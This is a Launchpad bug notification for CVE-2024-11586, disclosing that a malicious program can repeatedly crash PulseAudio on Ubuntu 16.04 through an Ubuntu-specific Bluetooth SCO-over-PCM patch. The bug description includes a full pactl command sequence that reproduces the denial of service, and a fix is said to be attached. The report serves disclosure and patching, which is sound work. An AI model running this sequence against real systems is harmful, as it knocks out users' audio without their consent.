https://www.cve.org/CVERecord?id=CVE-2024-11586 published.
Updates will go to ESM. Thanks Ratchanan! ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/2078822 Title: With Bluetooth headset connect, a malicious program can crash Pulseaudio on Ubuntu16.04 Status in pulseaudio package in Ubuntu: New Bug description: On Ubuntu 16.04, a malicious app could abuse a Bluetooth module configuration for Ubuntu Touch to crash Pulseaudio: ``` pactl unload-module module-bluez5-discover pactl load-module module-null-sink sink_name=sink.fake.sco rate=8000 channels=1 pactl load-module module-null-source source_name=source.fake.sco rate=8000 channels=1 pactl load-module module-bluez5-discover sco_sink=sink.fake.sco sco_source=source.fake.sco # Now, connect a Bluetooth headset, then: pactl list cards # Make note of Bluetooth card name. pactl set card-profile bluez_card.<address> headset_head_unit pactl set-sink-volume sink.fake.sco 69 ``` An app could repeatedly do this, preventing audio from working as long as a Bluetooth headset is still connected. This is discovered while working on a similar patch on UBports' Ubuntu Touch 20.04. Admittedly, I was not able to actually test this on Ubuntu 16.04 + ESM proper yet, but a similar set of commands is tested to be able to crash Pulseaudio on Ubuntu Touch 20.04, which carry a forward-ported version of the SCO-over-PCM patch. A patch which should fix this issue is attached. This is a problem in Ubuntu-specific SCO-over-PCM patch, and thus is not applicable in other distros. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/2078822/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
